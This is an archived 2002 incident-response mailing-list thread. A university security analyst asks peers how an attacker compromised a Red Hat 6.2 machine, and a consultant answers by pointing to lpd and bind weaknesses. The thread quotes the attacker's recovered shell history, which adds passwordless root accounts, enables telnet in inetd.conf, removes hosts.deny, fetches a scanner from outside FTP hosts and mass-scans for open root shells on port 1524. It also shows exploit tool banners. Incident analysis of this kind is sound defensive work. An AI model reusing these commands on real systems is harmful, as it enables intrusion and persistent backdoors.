Eric, please note that 'lpd' is running. Within rh6.2, that means a whole homerun for a script kiddie. Not to mention that, if named was running, again with rh6.2 that would mean bind < 8.2.3P5, which in turn means serious troubles. Those two come to my head at a first glance... I cannot tell for sure about all the other stuff, since I'd have to take a look at some vuln database first. Both vulns have well-known and old exploits, very easy to find and use against such a default installation. Have a look at /var/named , and look for any strange directory you could see there. If you find something strange, it's very likely you've been caught via the bind exploit. Keep in mind that lpd also gives full root compromise anyway, thought. Greets, Jose Miguel Varet Security Consultant ISIS S.L. ----- Original Message ----- From: "Hines, Eric" <eric3at_private> To: <incidentsat_private> Cc: "'Tina Bird'" <tbird@precision-guesswork.com>; "'Lance Spitzner'" <lanceat_private>; "'Michael Clark'" <mikeat_private> Sent: Wednesday, March 06, 2002 8:48 PM Subject: Compromised - Port 1524 > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Fellow Analysts: > > This morning several of our systems were compromised and am still > working to find out what exploit was used. Please offer any advice > you can. A utility was left behind along with a massive amount of > systems in output log files that was created by this utility. I have > provided all my information below. > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > My notes > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > I went through the system and found the following things. The /tmp > directory was the hackers home directory he was using. Turns out he > deleted that .bash_history file and forgot to nail > /root/.bash_history > However, it is still unclear to me how he broke in. Notice that he > did an "echo telnetd >>" over to inetd.conf and started up telnetd. > Yeh, he could have run the telnetd b0f exploits against it but whats > the point? He already had root access to the machine. I also checked > the version of SSHD, I've checked its version against my 500 TARGETS > for ./x2, ./x3 and ./x5 and doesn't seem to match anything. I checked > to see if snmp was running (wasn't running). Does anyone know if > Redhat 6.2 default install contained a vulnerable wu_ftpd? > Unfortunately the machine was rebuilt before I could check the > version of wu_ftpd. I went ahead and checked my exploits for it and > wonder if anyone here had any default wuftpd installs of redhat 6.2 > hit? If anyone has responded to a similar machine, please let me > know! > > Eric > > > > [loki@tigerteam1 woot]$ ./forcer -t0 > ./forcer magic > ./forcer <type> <addr> > 1) RH7.2 - 2.6.2(1) Wed Aug 9 05:54:50 EDT 2002 > 2) RH7.2 - wu-2.6.2(2) > 3) Special wu-2.6.3(3) > > [loki@tigerteam1 new]$ ./wu-sploit -t0 > 7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2) > team teso (thx bnuts, tomas, synnergy.net !). > Compiled for MnM 01/12/2001..pr0t! > > num . description > - ----+------------------------------------------------------- > 1 | Caldera eDesktop|eServer|OpenLinux 2.3 update > [wu-ftpd-2.6.1-13OL.i386.rpm] > 2 | Debian potato [wu-ftpd_2.6.0-3.deb] > 3 | Debian potato [wu-ftpd_2.6.0-5.1.deb] > 4 | Debian potato [wu-ftpd_2.6.0-5.3.deb] > 5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb] > 6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm] > 7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm] > 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm] > 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] > 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] > 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] > 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] > 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] > 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] > 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] > 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] > 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] > 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] > 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] > 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] > 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] > 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] > 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] > 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] > 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] > 26 | SuSE 7.0 [wuftpd.rpm] > 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] > 28 | SuSE 7.1 [wuftpd.rpm] > 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] > 30 | SuSE 7.2 [wuftpd.rpm] > 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] > 32 | SuSE 7.3 [wuftpd.rpm] > 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm] > 34 | Slackware 7.1 > > > [root@tigerteam1 floppy]# telnet 192.168.0.1 22 > > Connected to 192.168.0.1 22 > Escape character is '^]'. > SSH-1.99-OpenSSH_3.0.2p1 > > > > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > System Info > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > Redhat 6.2 (default install) > SSHD > RPC* > > > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > # ps -aux > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > root 1 0.0 0.1 1120 416 ? S Feb25 0:04 init > root 2 0.0 0.0 0 0 ? SW Feb25 0:00 > [keventd] > root 3 0.0 0.0 0 0 ? SW Feb25 0:00 > [kapm-idled] > root 4 0.0 0.0 0 0 ? SWN Feb25 0:00 > [ksoftirqd_CPU0] > root 5 0.0 0.0 0 0 ? SW Feb25 0:10 > [kswapd] > root 6 0.0 0.0 0 0 ? SW Feb25 0:00 > [kreclaimd] > root 7 0.0 0.0 0 0 ? SW Feb25 0:00 > [bdflush] > root 8 0.0 0.0 0 0 ? SW Feb25 0:00 > [kupdated] > root 9 0.0 0.0 0 0 ? SW Feb25 0:00 > [khubd] > bin 348 0.0 0.1 1212 484 ? S Feb25 0:00 > portmap > rpcuser 368 0.0 0.2 1340 544 ? S Feb25 0:00 > rpc.statd > root 382 0.0 0.1 1104 400 ? S Feb25 0:00 > /usr/sbin/apmd -p 10 -w 5 -W -s /etc/sysconfig/apm-scripts/suspend -r > root 434 0.0 0.1 1208 444 ? S Feb25 0:00 > /usr/sbin/automount --timeout 60 /misc file /etc/auto.misc > root 436 0.0 0.1 1208 500 ? S Feb25 0:00 > /usr/sbin/automount --timeout 60 /home file /etc/auto.home > root 441 0.0 0.1 1208 444 ? S Feb25 0:00 > /usr/sbin/automount --timeout 60 /auto file /etc/auto.auto > root 483 0.0 0.3 6264 1016 ? S Feb25 0:00 > /sbin/mount.smbfs //physast1/Export /physast1 -o rw username turnshek > root 502 0.0 0.1 1172 500 ? S Feb25 0:06 > syslogd -m 0 > root 511 0.0 0.1 1944 436 ? S Feb25 0:10 klogd > nobody 525 0.0 0.2 1312 600 ? S Feb25 0:00 identd > - -e -o > nobody 529 0.0 0.2 1312 600 ? S Feb25 0:00 identd > - -e -o > nobody 530 0.0 0.2 1312 600 ? S Feb25 0:03 identd > - -e -o > nobody 531 0.0 0.2 1312 600 ? S Feb25 0:03 identd > - -e -o > nobody 532 0.0 0.2 1312 600 ? S Feb25 0:00 identd > - -e -o > daemon 543 0.0 0.1 1144 464 ? S Feb25 0:00 > /usr/sbin/atd > root 557 0.0 0.2 1328 556 ? S Feb25 0:00 crond > root 575 0.0 0.1 1156 496 ? S Feb25 0:00 inetd > root 589 0.0 0.1 1204 440 ? S Feb25 0:00 lpd > root 615 0.0 0.1 1192 316 ? S Feb25 0:00 > rpc.rquotad > root 645 0.0 0.1 1248 364 ? S Feb25 0:00 > rpc.mountd > root 654 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 655 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 656 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 657 0.0 0.0 0 0 ? SW Feb25 0:00 > [lockd] > root 658 0.0 0.0 0 0 ? SW Feb25 0:00 > [rpciod] > root 659 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 660 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 661 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 662 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > root 663 0.0 0.0 0 0 ? SW Feb25 0:00 [nfsd] > condor 696 0.0 0.4 2816 1080 ? S Feb25 1:12 > /auto/condor/sbin/condor_master > condor 704 0.0 0.6 3596 1576 ? S Feb25 0:56 > condor_startd -f > condor 715 0.0 0.4 3324 1060 ? S Feb25 0:00 > condor_schedd -f > root 741 0.0 0.3 2432 780 ? S Feb25 0:00 > sendmail: accepting connections > root 756 0.0 0.1 1156 408 ? S Feb25 0:00 gpm -t > imps2 > xfs 803 0.0 0.4 3404 1072 ? S Feb25 0:01 xfs > - -droppriv -daemon -port -1 > root 846 0.0 0.2 2092 672 ? S Feb25 0:29 sshd > root 852 0.0 0.1 1092 336 tty1 S Feb25 0:00 > /sbin/mingetty tty1 > root 853 0.0 0.1 1092 336 tty2 S Feb25 0:00 > /sbin/mingetty tty2 > root 854 0.0 0.1 1092 336 tty3 S Feb25 0:00 > /sbin/mingetty tty3 > root 855 0.0 0.1 1092 336 tty4 S Feb25 0:00 > /sbin/mingetty tty4 > root 858 0.0 0.1 1092 336 tty5 S Feb25 0:00 > /sbin/mingetty tty5 > root 859 0.0 0.1 1092 336 tty6 S Feb25 0:00 > /sbin/mingetty tty6 > root 860 0.0 0.2 2744 620 ? S Feb25 0:00 > /usr/bin/gdm -nodaemon > root 865 2.8 2.5 48200 6564 ? S Feb25 358:24 > /etc/X11/X -auth /var/gdm/:0.Xauth :0 > root 866 0.0 0.3 3452 972 ? S Feb25 0:00 > /usr/bin/gdm -nodaemon > turnshek 19979 0.0 0.7 5640 1864 ? S Mar03 0:00 > /usr/bin/gnome-session > turnshek 20009 0.0 0.6 5436 1596 ? S Mar03 0:00 > gnome-smproxy --sm-config-prefix /.gnome-smproxy-lr5q76/ --sm-client- > turnshek 20013 0.0 0.6 4376 1676 ? S Mar03 0:03 > enlightenment -theme /usr/share/enlightenment/themes/CleanBig -smfile > turnshek 20019 0.9 0.7 5968 2036 ? S Mar03 32:05 > magicdev --sm-client-id 11888e7113000098519292400000009670005 > turnshek 20030 0.0 0.3 2636 804 ? S Mar03 0:00 > gnome-name-service > turnshek 20032 0.0 1.0 7072 2652 ? S Mar03 0:01 panel > - --sm-config-prefix /panel.d/Session-Cjxxlw/ --sm-client-id 1188 > turnshek 20034 0.0 0.6 3188 1648 ? S Mar03 0:05 > xscreensaver -no-splash -timeout 20 -nice 10 > turnshek 20036 0.0 0.9 7536 2404 ? S Mar03 0:00 gmc > - --sm-config-prefix /gmc-mKvBkw/ --sm-client-id 11888e711300009851 > turnshek 20042 0.0 0.9 6100 2388 ? S Mar03 0:09 > gnomepager_applet --activate-goad-server gnomepager_applet > turnshek 20044 0.0 0.9 6068 2308 ? S Mar03 0:00 > gen_util_applet --activate-goad-server gen_util_applet > turnshek 22000 0.1 2.0 56824 5168 ? S Mar04 4:55 > /usr/lib/netscape/netscape-communicator -irix-session-management > turnshek 22016 0.0 0.2 16660 664 ? S Mar04 0:00 (dns > helper) > turnshek 22046 0.0 0.8 5832 2096 ? S Mar04 0:08 > gnome-terminal > turnshek 22047 0.0 0.1 1144 440 ? S Mar04 0:00 > gnome-pty-helper > turnshek 22048 0.0 0.2 2424 600 pts/0 S Mar04 0:00 -csh > turnshek 25361 0.0 0.8 5800 2100 ? S Mar05 0:00 > gnome-terminal > turnshek 25362 0.0 0.1 1144 440 ? S Mar05 0:00 > gnome-pty-helper > turnshek 25363 0.0 0.2 2424 600 pts/1 S Mar05 0:00 -csh > root 7402 0.0 0.3 1704 928 ? S 03:49 0:00 bash > - -i > root 9237 0.0 0.1 1112 404 ? S 04:50 0:00 tail > - -f 211.out > root 9506 0.0 0.1 1104 396 ? S 05:07 0:00 tail > - -f 211.out > root 10302 0.0 0.1 1100 384 ? S 06:35 0:00 tail > - -f 122.out > root 11808 9.8 0.2 1416 692 ? RN 07:36 0:25 > ./synscan 130 130.out eth0 30000 1524 > root 11812 52.3 0.2 1412 692 ? RN 07:36 2:13 > ./synscan 130 130.out eth0 30000 1524 > root 11817 0.0 0.0 0 0 ? ZN 07:38 0:00 > [synscan <defunct>] > root 11818 0.0 0.0 0 0 ? ZN 07:38 0:00 > [synscan <defunct>] > root 11819 0.0 0.0 0 0 ? ZN 07:38 0:00 > [synscan <defunct>] > root 11820 0.0 0.0 0 0 ? ZN 07:38 0:00 > [synscan <defunct>] > root 11821 0.0 0.0 0 0 ? ZN 07:38 0:00 > [synscan <defunct>] > root 11822 0.0 0.0 0 0 ? ZN 07:39 0:00 > [synscan <defunct>] > turnshek 11825 26.4 2.6 21660 6864 ? RN 07:39 0:16 > sproingies -root > root 11830 0.0 0.0 0 0 ? ZN 07:39 0:00 > [synscan <defunct>] > root 11834 0.6 0.6 2996 1580 ? S 07:40 0:00 sshd > root 11835 0.0 0.3 1724 972 pts/2 S 07:40 0:00 -bash > root 11859 0.0 0.3 2556 872 pts/2 R 07:40 0:00 ps > - -augxw > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > Contents of /etc/passwd > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > u:x:12347:12347::/tmp:/bin/bash > r:x:0:12348::/tmp:/bin/bash > > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > Output generated by synscan1.6.tar (contains ip addresses of systems > with > Port 1524 (ingreslock) open, logging connections that produce a # > prompt > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > 122.out > 128.out > 130.out > 218.out > > > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > .bash_history > - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > - -= > > > uname -a; > cat /proc/cpuifo; > cat /proc/cpuinfo' > '; > cat /proc/cpuinfo; > ping -c 5 www.yahoo.com; > /usr/sbin/adduser -p "" u; > tail /etc/passwd; > /usr/sbin/adduser -p "" -d /tmp u; > /usr/sbin/adduser -p "" -d /tmp -u 0 r; > grep rsdh /etc/inetd.conf; > grep rsh /etc/inetd.conf; > grep shell /etc/inetd.conf; > cat /etc/inetd.conf; > ls -al /etc/inetd.conf; > locate ...; > /sbin/ifconfig -a; > dmesg | grep -i promi; > tail /etc/rc.d/rc.local; > ps auwx| grep named; > cat /etc/redhat-rel*; > ps auwx| grep stat; > exit; > la -L /UAE/AVIN/IN.DRPS; > ls -al /usr/sbin/in.ftpd; > locate in.ftpd; > tail /etc/passwd; > echo "telnet stream tcp nowait root /usr/sbin/tcpd > in.telnetd" >> /etc/inetd.conf; > ps auwx| grep inetd; > kill -HUP 575; > exit; > cat /etc/hosts.deny; > mv /etc/hosts.deny /etc/host.deny; > exit; > locate in.rlogin; > ls -al /usr/sbin/in.*; > locate telnet; > ping -c 10 www.yahoo.com; > wget; > which lynx; > ncftp > cd /tmp; > #cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> > ftp://211.23.134.186/../../home/test3/t0rnscan;rm -rf > /root/.ncftp;chmod 755 t0rnscan; > cd /tmp;ncftpget -u <SANITIZED> -p <SANITIZED> > ftp://211.172.226.26/../../tmp/synscan; > ls -al; > cat fuk.ps; > chmod 755 synscan; > nohup ./synscan 216 216.out eth0 10000 1524 >/dev/null > 2>/dev/null&2>/dev/null; > ping -c 5 www.yahoo.com; > ls -al 216.out; > ls -al 216.out; > grep "#" 216.out; > ls -al 216.out; > grep "#" 216.out;exit; > cd /tmp; > grep "#" *.out; > tail 216.out; > tail 216.out; > tail 216.out; > grep access *.out; > tail 216.out; > grep "#" 216.out; > tail 216.out; > tail 216.out; > tail 216.out; > ps auwx| grep synscan; > tail 216.out; > tail 216.out; > killall -9 synscan; > egrep "access|#" *.out; > rm -rf 216.out; > killall -9 synscan; > nohup ./synscan 217 217.out eth0 30000 1524 >/dev/null > 2>/dev/null&2>/dev/null; > ping -c 5 www.yahoo.com; > ls -al 217.out; > cat 217.out; > cat 217.out; > tail 217.out; > grep "#" 217.out; > tail 217.out; > tail 217.out; > tail 217.out; > tail 217.out; > grep "#" 217.out; > tail 217.out; > grep "#" 217.out | grep -v root; > tail 217.out; > tail 217.out; > tail 217.out; > tail 217.out; > tail 217.out; > grep "#" 217.out; > tail 217.out; > > tai217.out; > tail 217.out; > grep "#" 217.out | grep -v root; > rm -rf 217.out; > nohup ./synscan 218 218.out eth0 30000 1524 >/dev/null > 2>/dev/null&2>/dev/null; > ls -al 218.out; > ls -al 218.out; > ls -al 218.out; > cat 218.out; > exit; > cd /tmp; > ls; > tail 218.out; > grep "#" 218.out; > tail *.out; > killall -9 synscan; > nohup ./synscan 24 24.out eth0 50000 10008 >/dev/null > 2>/dev/null&2>/dev/null; > ls -al 24.out; > ls -al 24.out; > ls -al 24.out; > ls -al 24.out; > p[s auwwx| grep synscan; > ps auwx| grep synscan; > ls -al 24.out; > ls -al 24.out; > ls -al 24.out; > ls -al 24.out; > ping -c 5 www.yahoo.com; > ping -c 5 www.yahoo.com; > ls -al 24.out; > killall -9 synscan; > nohup ./synscan 24 24.out eth0 30000 10008 >/dev/null > 2>/dev/null&2>/dev/null; > ping -c 5 www.yahoo.com; > tail -f 24.out&2 >/dev/null; > ps auwx| grep tail; > ls -al 24.out; > / > /sbin/ifconfig -a; > locate tcp.log; > last| head -5; > tail /home/sandhya/.bash_history; > ls -al ~sandhya; > cat /home/sandhya/.history; > cat ~sandhya/.history; > w; > ls -al 24.out; > > > > ================================================ > Eric S. Hines > Technical Lead > Information Security Group > Computer Security Incident Response Team (CSIRT) > - ------------------------------------------------ > University of Pittsburgh > Cathedral of Learning #701 > Pittsburgh PA, 15260 > [ph] +1 412 624-6728 > [mo] +1 412 334-2379 > [em] eric3at_private > [al] 4123342370at_private > ================================================ > > -----BEGIN PGP SIGNATURE----- > Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com> > > iQA/AwUBPIZyXz4GESb0uqLMEQInbgCggBloMYEHfCWVbgcNKRTsu06Z/FAAnjgq > wg9hokf1qGcgcYLiBI8iq+rj > =2dWC > -----END PGP SIGNATURE----- > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Mar 06 2002 - 15:44:28 PST